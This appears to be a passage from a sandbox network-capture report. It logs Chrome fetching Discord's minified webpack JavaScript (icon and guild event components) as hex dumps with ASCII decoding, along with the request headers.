                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=AvNavXW7DDCNgmSvKuaF7ETFbJLYZ1_4UsbUhLNw5Xo-1702226721674-0-604800000
                                                                          2023-12-10 16:45:22 UTC1126INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 37 34 35 39 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 33 39 37 38 64 37 33 31 66 35 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:22 GMTContent-Type: application/javascriptContent-Length: 74598Connection: closeCF-Ray: 8336f53978d731f5-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:22 UTC243INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 34 34 35 30 34 22 5d 2c 7b 33 39 35 32 34 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 73 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 73 2e 70 2b 22 30 32 37 31 36 66 63 35 65 61 64 63 36 32 32 31 37 36 65 63 2e 73 76 67 22 7d 2c 38 34 37 37 36 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 73 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 73 2e 70 2b 22 37 61 35 31 33 33 38 30 62 32 39 62 30 38 37 36 31 39 34 34 2e 73 76 67 22 7d 2c 35 35 36 32 30 33
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["44504"],{395243:function(e,t,s){"use strict";e.exports=s.p+"02716fc5eadc622176ec.svg"},847768:function(e,t,s){"use strict";e.exports=s.p+"7a513380b29b08761944.svg"},556203
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 73 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 73 2e 70 2b 22 32 36 35 62 37 33 66 38 61 39 37 37 64 36 30 38 63 65 36 64 2e 73 76 67 22 7d 2c 31 34 36 39 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 73 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 73 2e 70 2b 22 34 33 37 39 62 62 36 66 34 61 30 62 36 61 65 66 34 63 36 65 2e 73 76 67 22 7d 2c 39 32 33 33 31 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 73 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 73 2e 70 2b 22 39 30 30 62 63 61 66 35 33 62 61 66 32 35 37 36 66 32 65 34 2e 73 76 67 22 7d 2c 34 35 35 30 33 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 73 29 7b 22 75 73 65 20
                                                                          Data Ascii: :function(e,t,s){"use strict";e.exports=s.p+"265b73f8a977d608ce6d.svg"},14696:function(e,t,s){"use strict";e.exports=s.p+"4379bb6f4a0b6aef4c6e.svg"},923313:function(e,t,s){"use strict";e.exports=s.p+"900bcaf53baf2576f2e4.svg"},455037:function(e,t,s){"use
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 33 61 61 37 35 61 37 61 62 62 31 35 33 61 33 31 36 66 34 2e 73 76 67 22 7d 2c 31 34 34 38 36 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 73 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 73 2e 70 2b 22 63 30 66 30 38 62 66 63 65 35 37 36 63 31 61 30 62 32 62 61 2e 73 76 67 22 7d 2c 33 30 39 35 30 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 73 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 73 2e 70 2b 22 63 37 36 65 38 66 33 35 62 31 37 65 66 30 34 65 34 37 39 33 2e 73 76 67 22 7d 2c 38 35 39 35 32 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 73 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 73 2e 70 2b 22 63 66 31 31 34 38 66 38 62 64 39 33 61 65 35 65 31 33 38 34 2e 73
                                                                          Data Ascii: 3aa75a7abb153a316f4.svg"},144865:function(e,t,s){"use strict";e.exports=s.p+"c0f08bfce576c1a0b2ba.svg"},309504:function(e,t,s){"use strict";e.exports=s.p+"c76e8f35b17ef04e4793.svg"},859528:function(e,t,s){"use strict";e.exports=s.p+"cf1148f8bd93ae5e1384.s
                                                                          2023-12-10 16:45:22 UTC37INData Raw: 2c 74 2c 73 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 73 2e 70 2b 22 30 30 62
                                                                          Data Ascii: ,t,s){"use strict";e.exports=s.p+"00b
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 65 62 35 65 63 63 62 64 38 39 62 64 36 38 33 31 61 2e 70 6e 67 22 7d 2c 35 30 36 31 39 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 73 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 73 2e 70 2b 22 61 65 62 30 38 38 34 65 36 34 39 62 65 31 34 31 38 31 35 31 2e 73 76 67 22 7d 2c 37 37 33 37 38 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 73 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 73 2e 72 28 74 29 2c 73 2e 64 28 74 2c 7b 42 6f 6f 73 74 54 69 65 72 31 53 69 6d 70 6c 65 49 63 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6c 7d 7d 29 3b 76 61 72 20 69 3d 73 28 22 33 37 39 38 33 22 29 3b 73 28 22 38 38 34 36 39 31 22 29 3b 76 61 72 20 72 3d 73 28 22 36 36 39 34 39 31 22 29 2c 61 3d 73 28 22 37 35 31 39 36 22 29
                                                                          Data Ascii: eb5eccbd89bd6831a.png"},506197:function(e,t,s){"use strict";e.exports=s.p+"aeb0884e649be1418151.svg"},773785:function(e,t,s){"use strict";s.r(t),s.d(t,{BoostTier1SimpleIcon:function(){return l}});var i=s("37983");s("884691");var r=s("669491"),a=s("75196")
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 20 31 2e 34 61 31 2e 35 39 20 31 2e 35 39 20 30 20 30 20 31 20 32 2e 31 20 30 6c 34 2e 39 20 34 41 33 2e 33 37 20 33 2e 33 37 20 30 20 30 20 31 20 31 39 20 38 76 38 63 30 20 31 2e 30 37 2d 2e 34 20 32 2e 30 36 2d 31 2e 30 35 20 32 2e 36 6c 2d 34 2e 39 20 34 63 2d 2e 36 35 2e 35 33 2d 31 2e 34 35 2e 35 33 2d 32 2e 31 20 30 6c 2d 34 2e 39 2d 34 41 33 2e 33 37 20 33 2e 33 37 20 30 20 30 20 31 20 35 20 31 36 56 38 63 30 2d 31 2e 30 37 2e 34 2d 32 2e 30 36 20 31 2e 30 35 2d 32 2e 36 6c 34 2e 39 2d 34 5a 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 75 7d 29 7d 29 7d 7d 2c 39 38 36 38 34 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 73 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 73 2e 72 28 74 29 2c 73 2e 64 28 74 2c 7b 42 6f 6f 73 74 54 69 65 72 33 53 69 6d 70 6c 65 49
                                                                          Data Ascii: 1.4a1.59 1.59 0 0 1 2.1 0l4.9 4A3.37 3.37 0 0 1 19 8v8c0 1.07-.4 2.06-1.05 2.6l-4.9 4c-.65.53-1.45.53-2.1 0l-4.9-4A3.37 3.37 0 0 1 5 16V8c0-1.07.4-2.06 1.05-2.6l4.9-4Z",className:u})})}},986845:function(e,t,s){"use strict";s.r(t),s.d(t,{BoostTier3SimpleI
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 38 38 34 36 39 31 22 29 3b 76 61 72 20 72 3d 73 28 22 36 36 39 34 39 31 22 29 2c 61 3d 73 28 22 37 35 31 39 36 22 29 3b 6c 65 74 20 6c 3d 65 3d 3e 7b 6c 65 74 7b 77 69 64 74 68 3a 74 3d 32 34 2c 68 65 69 67 68 74 3a 73 3d 32 34 2c 63 6f 6c 6f 72 3a 6c 3d 72 2e 64 65 66 61 75 6c 74 2e 63 6f 6c 6f 72 73 2e 49 4e 54 45 52 41 43 54 49 56 45 5f 4e 4f 52 4d 41 4c 2c 63 6f 6c 6f 72 43 6c 61 73 73 3a 75 3d 22 22 2c 2e 2e 2e 6f 7d 3d 65 3b 72 65 74 75 72 6e 28 30 2c 69 2e 6a 73 78 29 28 22 73 76 67 22 2c 7b 2e 2e 2e 28 30 2c 61 2e 64 65 66 61 75 6c 74 29 28 6f 29 2c 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 77 69 64 74 68 3a 74 2c 68 65 69 67 68 74 3a 73 2c 66 69 6c 6c 3a 22 6e 6f 6e 65 22 2c 76 69 65
                                                                          Data Ascii: 884691");var r=s("669491"),a=s("75196");let l=e=>{let{width:t=24,height:s=24,color:l=r.default.colors.INTERACTIVE_NORMAL,colorClass:u="",...o}=e;return(0,i.jsx)("svg",{...(0,a.default)(o),xmlns:"http://www.w3.org/2000/svg",width:t,height:s,fill:"none",vie
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 2e 64 65 66 61 75 6c 74 29 28 6f 29 2c 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 77 69 64 74 68 3a 74 2c 68 65 69 67 68 74 3a 73 2c 66 69 6c 6c 3a 22 6e 6f 6e 65 22 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 32 34 20 32 34 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 69 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 3a 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6c 3f 6c 3a 6c 2e 63 73 73 2c 64 3a 22 4d 35 2e 32 35 20 32 41 33 2e 32 35 20 33 2e 32 35 20 30 20 30 20 30 20 32 20 35 2e 32 35 76 32 2e 35 43 32 20 39 2e 35 35 20 33 2e 34 36 20 31 31 20 35 2e 32 35 20 31 31 68 32 2e 35 43 39 2e 35 35 20 31 31 20 31 31 20 39 2e 35 34 20 31 31 20 37 2e 37 35 76 2d 32 2e 35 43 31 31 20 33 2e
                                                                          Data Ascii: .default)(o),xmlns:"http://www.w3.org/2000/svg",width:t,height:s,fill:"none",viewBox:"0 0 24 24",children:(0,i.jsx)("path",{fill:"string"==typeof l?l:l.css,d:"M5.25 2A3.25 3.25 0 0 0 2 5.25v2.5C2 9.55 3.46 11 5.25 11h2.5C9.55 11 11 9.54 11 7.75v-2.5C11 3.
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 32 20 32 30 2e 38 32 61 31 32 2e 31 38 20 31 32 2e 31 38 20 30 20 30 20 30 20 35 2e 35 38 2d 35 2e 33 32 41 39 2e 34 39 20 39 2e 34 39 20 30 20 30 20 30 20 31 32 2e 34 37 20 31 34 68 2d 2e 39 34 63 2d 31 2e 38 38 20 30 2d 33 2e 36 33 2e 35 35 2d 35 2e 31 31 20 31 2e 34 39 5a 4d 31 32 20 31 33 61 34 20 34 20 30 20 31 20 30 20 30 2d 38 20 34 20 34 20 30 20 30 20 30 20 30 20 38 5a 22 2c 63 6c 69 70 52 75 6c 65 3a 22 65 76 65 6e 6f 64 64 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 75 7d 29 7d 29 7d 7d 2c 32 39 32 39 31 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 73 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 73 2e 72 28 74 29 2c 73 2e 64 28 74 2c 7b 53 6f 75 6e 64 62 6f 61 72 64 49 63 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6c 7d 7d 29 3b 76
                                                                          Data Ascii: 2 20.82a12.18 12.18 0 0 0 5.58-5.32A9.49 9.49 0 0 0 12.47 14h-.94c-1.88 0-3.63.55-5.11 1.49ZM12 13a4 4 0 1 0 0-8 4 4 0 0 0 0 8Z",clipRule:"evenodd",className:u})})}},292915:function(e,t,s){"use strict";s.r(t),s.d(t,{SoundboardIcon:function(){return l}});v


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          345192.168.2.550081162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:22 UTC860OUTGET /assets/361309226d7befece320.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=PybZ6TXQOksgAKqT6FcwsWY2ZMyheg42CN9l9p7Dw5M-1702226722042-0-604800000
                                                                          2023-12-10 16:45:22 UTC1134INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 32 32 34 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 33 39 38 38 62 65 32 35 38 65 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:22 GMTContent-Type: application/javascriptContent-Length: 12248Connection: closeCF-Ray: 8336f53988be258e-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:22 UTC235INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 35 31 30 37 37 22 5d 2c 7b 35 32 34 31 37 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6c 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6c 2e 72 28 74 29 2c 6c 2e 64 28 74 2c 7b 42 65 6c 6c 49 63 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 7d 29 3b 76 61 72 20 6e 3d 6c 28 22 33 37 39 38 33 22 29 3b 6c 28 22 38 38 34 36 39 31 22 29 3b 76 61 72 20 61 3d 6c 28 22 36 36 39 34 39 31 22 29 2c 73 3d 6c 28 22 37 35 31 39 36 22 29 3b 6c 65 74 20 72 3d 65 3d 3e 7b 6c 65
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["51077"],{524173:function(e,t,l){"use strict";l.r(t),l.d(t,{BellIcon:function(){return r}});var n=l("37983");l("884691");var a=l("669491"),s=l("75196");let r=e=>{le
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 74 7b 77 69 64 74 68 3a 74 3d 32 34 2c 68 65 69 67 68 74 3a 6c 3d 32 34 2c 63 6f 6c 6f 72 3a 72 3d 61 2e 64 65 66 61 75 6c 74 2e 63 6f 6c 6f 72 73 2e 49 4e 54 45 52 41 43 54 49 56 45 5f 4e 4f 52 4d 41 4c 2c 63 6f 6c 6f 72 43 6c 61 73 73 3a 75 3d 22 22 2c 2e 2e 2e 69 7d 3d 65 3b 72 65 74 75 72 6e 28 30 2c 6e 2e 6a 73 78 29 28 22 73 76 67 22 2c 7b 2e 2e 2e 28 30 2c 73 2e 64 65 66 61 75 6c 74 29 28 69 29 2c 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 77 69 64 74 68 3a 74 2c 68 65 69 67 68 74 3a 6c 2c 66 69 6c 6c 3a 22 6e 6f 6e 65 22 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 32 34 20 32 34 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 6e 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 3a 22 73 74
                                                                          Data Ascii: t{width:t=24,height:l=24,color:r=a.default.colors.INTERACTIVE_NORMAL,colorClass:u="",...i}=e;return(0,n.jsx)("svg",{...(0,s.default)(i),xmlns:"http://www.w3.org/2000/svg",width:t,height:l,fill:"none",viewBox:"0 0 24 24",children:(0,n.jsx)("path",{fill:"st
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 7b 72 65 74 75 72 6e 20 69 7d 7d 29 3b 76 61 72 20 6e 3d 6c 28 22 33 36 37 33 37 36 22 29 2c 61 3d 6c 28 22 31 38 30 31 36 31 22 29 2c 73 3d 6c 28 22 34 37 36 37 37 22 29 3b 6c 65 74 20 72 3d 7b 2e 2e 2e 6e 2e 64 65 66 61 75 6c 74 2e 67 75 69 6c 64 45 76 65 6e 74 52 75 6c 65 73 2e 6c 69 6e 6b 2c 72 65 61 63 74 3a 28 30 2c 73 2e 64 65 66 61 75 6c 74 29 28 7b 65 6e 61 62 6c 65 42 75 69 6c 64 4f 76 65 72 72 69 64 65 73 3a 21 31 2c 6d 75 73 74 43 6f 6e 66 69 72 6d 45 78 74 65 72 6e 61 6c 4c 69 6e 6b 3a 21 30 7d 29 2e 72 65 61 63 74 7d 2c 75 3d 7b 2e 2e 2e 6e 2e 64 65 66 61 75 6c 74 2e 67 75 69 6c 64 45 76 65 6e 74 52 75 6c 65 73 2e 63 68 61 6e 6e 65 6c 4d 65 6e 74 69 6f 6e 2c 72 65 61 63 74 3a 28 30 2c 61 2e 64 65 66 61 75 6c 74 29 28 7b 65 6e 61 62 6c 65 42
                                                                          Data Ascii: {return i}});var n=l("367376"),a=l("180161"),s=l("47677");let r={...n.default.guildEventRules.link,react:(0,s.default)({enableBuildOverrides:!1,mustConfirmExternalLink:!0}).react},u={...n.default.guildEventRules.channelMention,react:(0,a.default)({enableB
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 6e 54 65 78 74 2c 6c 2c 63 2e 6d 61 72 6b 75 70 2c 7b 5b 69 2e 74 72 75 6e 63 61 74 65 5d 3a 64 7d 29 2c 63 68 69 6c 64 72 65 6e 3a 6f 7d 29 7d 7d 2c 32 35 35 30 35 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6c 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6c 2e 72 28 74 29 2c 6c 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 75 7d 7d 29 3b 76 61 72 20 6e 3d 6c 28 22 33 37 39 38 33 22 29 3b 6c 28 22 38 38 34 36 39 31 22 29 3b 76 61 72 20 61 3d 6c 28 22 34 31 34 34 35 36 22 29 2c 73 3d 6c 2e 6e 28 61 29 2c 72 3d 6c 28 22 39 30 30 37 30 32 22 29 3b 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 6c 65 74 7b 73 6f 75 72 63 65 3a 74 2c 63 6c 61 73 73 4e 61 6d 65 3a 6c 7d 3d 65 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d
                                                                          Data Ascii: nText,l,c.markup,{[i.truncate]:d}),children:o})}},255050:function(e,t,l){"use strict";l.r(t),l.d(t,{default:function(){return u}});var n=l("37983");l("884691");var a=l("414456"),s=l.n(a),r=l("900702");function u(e){let{source:t,className:l}=e;return null=
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 75 6c 65 64 45 76 65 6e 74 53 74 61 74 75 73 2e 53 43 48 45 44 55 4c 45 44 3a 6e 75 6c 6c 3b 69 66 28 6e 75 6c 6c 3d 3d 41 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 6c 65 74 7b 65 6e 74 69 74 79 5f 74 79 70 65 3a 4d 2c 73 74 61 74 75 73 3a 47 2c 72 65 63 75 72 72 65 6e 63 65 5f 72 75 6c 65 3a 4f 7d 3d 41 3b 72 65 74 75 72 6e 28 30 2c 6e 2e 6a 73 78 73 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 73 28 43 2e 73 74 61 74 75 73 43 6f 6e 74 61 69 6e 65 72 2c 74 29 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 6e 2e 6a 73 78 29 28 4e 2e 47 75 69 6c 64 45 76 65 6e 74 54 69 6d 65 53 74 61 74 75 73 2c 7b 73 74 61 72 74 54 69 6d 65 3a 4c 2e 74 6f 49 53 4f 53 74 72 69 6e 67 28 29 2c 73 74 61 74 75 73 3a 6e 75 6c 6c 21 3d 77 3f 77 3a 47 2c 65 76 65 6e 74 54 79
                                                                          Data Ascii: uledEventStatus.SCHEDULED:null;if(null==A)return null;let{entity_type:M,status:G,recurrence_rule:O}=A;return(0,n.jsxs)("div",{className:s(C.statusContainer,t),children:[(0,n.jsx)(N.GuildEventTimeStatus,{startTime:L.toISOString(),status:null!=w?w:G,eventTy
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 65 66 61 75 6c 74 2c 7b 64 65 73 63 72 69 70 74 69 6f 6e 3a 72 2c 63 6c 61 73 73 4e 61 6d 65 3a 73 28 6c 2c 43 2e 64 65 73 63 72 69 70 74 69 6f 6e 29 2c 74 72 75 6e 63 61 74 65 3a 69 2c 67 75 69 6c 64 49 64 3a 63 7d 29 5d 7d 29 2c 6e 75 6c 6c 21 3d 64 26 26 28 30 2c 6e 2e 6a 73 78 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 43 2e 74 68 75 6d 62 6e 61 69 6c 43 6f 6e 74 61 69 6e 65 72 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 6e 2e 6a 73 78 29 28 6d 2e 64 65 66 61 75 6c 74 2c 7b 73 6f 75 72 63 65 3a 64 2c 63 6c 61 73 73 4e 61 6d 65 3a 43 2e 74 68 75 6d 62 6e 61 69 6c 7d 29 7d 29 5d 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 44 28 65 29 7b 6c 65 74 7b 68 65 61 64 65 72 56 61 72 69 61 6e 74 3a 74 2c 64 65 73 63 72 69 70 74 69 6f 6e 43 6c 61 73 73 4e 61 6d
                                                                          Data Ascii: efault,{description:r,className:s(l,C.description),truncate:i,guildId:c})]}),null!=d&&(0,n.jsx)("div",{className:C.thumbnailContainer,children:(0,n.jsx)(m.default,{source:d,className:C.thumbnail})})]})}function D(e){let{headerVariant:t,descriptionClassNam
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 6c 61 73 73 4e 61 6d 65 3a 5f 2e 6e 65 77 42 61 64 67 65 54 65 78 74 2c 76 61 72 69 61 6e 74 3a 22 74 65 78 74 2d 78 73 2f 62 6f 6c 64 22 2c 63 68 69 6c 64 72 65 6e 3a 53 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 4e 45 57 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 29 7b 6c 65 74 7b 63 68 69 6c 64 72 65 6e 3a 74 2c 63 6c 61 73 73 4e 61 6d 65 3a 6c 2c 74 6f 6f 6c 74 69 70 54 65 78 74 3a 6e 7d 3d 65 3b 72 65 74 75 72 6e 28 30 2c 73 2e 6a 73 78 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 69 28 5f 2e 65 76 65 6e 74 53 74 61 74 75 73 43 6f 6e 74 61 69 6e 65 72 2c 6c 29 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 73 2e 6a 73 78 29 28 45 2e 54 6f 6f 6c 74 69 70 2c 7b 70 6f 73 69 74 69 6f 6e 3a 22 72 69 67 68 74 22 2c 74 65 78 74 3a 6e
                                                                          Data Ascii: lassName:_.newBadgeText,variant:"text-xs/bold",children:S.default.Messages.NEW})})}function p(e){let{children:t,className:l,tooltipText:n}=e;return(0,s.jsx)("div",{className:i(_.eventStatusContainer,l),children:(0,s.jsx)(E.Tooltip,{position:"right",text:n
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 65 6e 74 53 74 61 74 75 73 2e 41 43 54 49 56 45 3f 33 3a 78 2e 47 75 69 6c 64 53 63 68 65 64 75 6c 65 64 45 76 65 6e 74 53 74 61 74 75 73 44 6f 6e 65 2e 68 61 73 28 6c 29 3f 34 3a 56 3f 32 3a 62 3f 31 3a 30 2c 5b 6c 2c 6e 75 6c 6c 3d 3d 4d 3f 76 6f 69 64 20 30 3a 4d 2e 69 73 5f 63 61 6e 63 65 6c 65 64 2c 56 2c 62 5d 29 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6c 2c 6e 2c 61 29 7b 73 77 69 74 63 68 28 65 29 7b 63 61 73 65 20 31 3a 72 65 74 75 72 6e 20 61 3e 30 3f 53 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 53 54 41 52 54 49 4e 47 5f 49 4e 5f 4d 49 4e 55 54 45 53 2e 66 6f 72 6d 61 74 28 7b 6d 69 6e 75 74 65 73 3a 61 7d 29 3a 53 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 53 54 41 52 54 49 4e 47 5f 53 4f 4f 4e 3b 63 61 73 65 20
                                                                          Data Ascii: entStatus.ACTIVE?3:x.GuildScheduledEventStatusDone.has(l)?4:V?2:b?1:0,[l,null==M?void 0:M.is_canceled,V,b]),P=function(e,t,l,n,a){switch(e){case 1:return a>0?S.default.Messages.STARTING_IN_MINUTES.format({minutes:a}):S.default.Messages.STARTING_SOON;case
